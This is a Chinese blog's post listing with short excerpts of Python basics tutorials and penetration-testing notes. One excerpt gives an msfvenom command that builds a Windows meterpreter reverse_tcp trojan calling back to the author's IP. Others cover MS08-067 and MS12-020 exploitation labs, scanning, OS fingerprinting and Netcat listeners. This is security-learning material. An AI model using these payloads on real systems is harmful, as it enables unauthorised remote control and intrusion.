- 博客(16)
- 收藏
- 关注
RSS订阅原创 Msfvenom制作Windows木马程序
Mefvenom简介: msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线开始制作: 1:生成木马程序:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己的ip lport=端口号(越大越好,不能超过65535) ...
2018-08-29 20:49:07
4180
原创 微软ms08-067渗透实践
简单描述:MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的...
2018-08-29 20:28:41
5285
原创 微软MS12-020漏洞渗透实验
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未...
2018-08-29 12:56:01
7747
原创 python与函数的故事(基础篇)
函数是组织好的,可重复使用的,用来实现单一,或相关联功能的代码段。函数能提高应用的模块性,和代码的重复利用率。Python提供了许多内嵌函数,如下图: 可以通过查看官网了解pthon内置函数的功能:python官网之内置函数 也可以在交互命令行通过help(函数名)查看该函数帮助信息.int("123") #使用int函数可以将字符串"123" 转换成整型123...
2018-08-28 15:55:20
279
原创 简述python中的元组
Python的元组(tuple)与列表(list)类似,不同之处在于元组的元素不能修改,所以列表可以增删改查,元组只支持查询和遍历.元组使用小括号,列表使用方括号。元组创建很简单,只需要在括号中添加元素,并使用逗号隔开即可。a=(1,2,3,4,5) #创建元组a,并赋值a[0] #根据...
2018-08-28 15:48:13
225
原创 python之循环,遍历,嵌套
遍历:将文件,字符串,列表,元组,字典等里面的数据一一列举出来字符串遍历:num="hello,world" #创建字符串并赋值for i in num: #对于字符串的for循环遍历,变量I表示该字符串中任意一个元素,i只为一个变量,可以随意起名 print (i) #输出的是该字符串的每个字符,输出一个字符换一...
2018-08-28 15:46:44
1908
原创 python中字典的常见操作
Python字典是一种可变容器模型,且可存储任意类型对象,如字符串、数字、元组等其他容器模型。字典的每个键值(key=>value)对用冒号(:)分割,每个对之间用逗号(,)分割,整个字典包括在花括号({})中 ,格式如下所示:d = {key1 : value1, key2 : value2 }键必须是唯一的,但值则不必。值可以取任何数据类型,但键必须是不可变的,如字符...
2018-08-28 15:41:56
1754
原创 python中列表的增删改查
list列表是python内置的一种数据类型,list是一种有序的集合,可以随时添加和删除元素创建列表 格式:在[ ]中添加各种数据,使用逗号将其分隔开来如果是空列表,直接[]通常会把list赋值给一个变量,通过这个变量引用列表score=['Bob','Tom','Jack',98,90,True,False]由于Python是动态语言,所以list中包含的元素并不要求...
2018-08-28 15:36:11
1319
原创 python字符串的常见操作
1,字符串 1.1,字符串的创建和赋值 字符串是python中最常见的数据类型,我们使用引号(单引号或者双引号都可以)来创建字符串创建字符串很简单,只要给变量赋一个值即可,例如:var1="hello,world!"var2="helli,python!"1.2,字符串的索引和切片 python的下标就是编号,就好比超市中的存储柜的编号,通过这个编号就能找到相应的存储空间...
2018-08-28 15:29:30
309
原创 python基础入门篇
1,变量以及类型 在Python中,存储一个数据,需要一个叫做变量的东西,如下示例:num1 = 100 #创建一个变量num1,并把100赋值给num1这个变量num2 = 87 #创建一个变量num2,并把87赋值给num2这个变量result = num1 + num2 #创建一个变量result,并把num1+num2这个值赋给result这个变量在程序中,为了更充分...
2018-08-28 15:07:07
157
原创 Python简介
Python发展历史起源Python的作者,Guido von Rossum,荷兰人。1982年,Guido从阿姆斯特丹大学获得了数学和计算机硕士学位。然而,尽管他算得上是一位数学家,但他更加享受计算机带来的乐趣。用他的话说,尽管拥有数学和计算机双料资质,他总趋向于做计算机相关的工作,并热衷于做任何和编程相关的活儿。在那个时候,Guido接触并使用过诸如Pascal、C、Fortr...
2018-08-28 14:42:30
1331
原创 渗透测试之操作系统识别
利用TTL起始值判断操作系统,不同类型的操作系统都有默认的TTL值(简陋扫描,仅作参考)TTL起始值:Windows xp(及在此版本之前的windows) 128 (广域网中TTL为65-128)Linux/Unix64(广域网中TTL为1-64)某些Unix:255网关:255使用nmap识别操作系统:nmap -O 192.168.45.129 #参数-O表示扫描操作系...
2018-08-28 14:36:16
8064
1
原创 渗透测试之服务扫描
服务扫描:识别开放端口上运行的应用识别目标操作系统,Windows,Linux等扫描方法:Banner捕获:扫描端口,通过工具识别端口对应的服务,不准确,仅作参考服务识别:基于指纹信息判断操作系统识别SNMP分析:通过SNMP识别目标系统,SNMP通过系统内部信息进行探测,结果比较准确防火墙识别:识别边界防火墙,绕过防火墙Banner捕获:通过软件开发商,软件名称,...
2018-08-28 14:16:54
3037
原创 渗透测试之端口扫描(二)
端口扫描:端口对应网络服务及应用端程序 服务端程序的漏洞通过端口攻入 发现开放的端口 更具体的攻击面 UDP端口扫描: 如果收到ICMP端口不可达,表示端口关闭 如果没有收到回包,则证明端口是开放的 和三层扫描IP刚好相反Scapy端口开发扫描 ,其命令为:sr1(IP(dst=”192.168....
2018-08-27 22:21:10
2545
原创 渗透测试之被动信息收集
被动信息收集:不与目标直接交互 1,公开渠道可获得的信息 2,与目标系统不产生交往 信息收集内容:IP地址段/域名信息/邮件地址/文档图片数据/公司地址/公司组织架构/联系电话,传真号码/人员姓名,职务/目标系统使用的技术架构/公开的商务信息 信息用途:用信息描述目标/发现/社会工程学/物理缺口 信息收集—DNS 域名解析成IP地址 域名与FQ...
2018-08-27 21:28:13
1547
原创 Netcat,Wireshark,Tcpdump简介与使用
Netcat,TcpdumpNETCAT—NC 1. 网络工具中的瑞士军刀—小身材,大智慧 2. 侦听模式/传统模式 3. telnet/获取banner信息,nc使用telnet远程连接, 命令为:nc –nv 目标地址 目标端口 4. 传输文本信息(默认不加密): 例:A:nc –l –p 4444 作为服务端 -l表示打开监听模式,打开某个端口...
2018-08-27 21:20:15
849
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人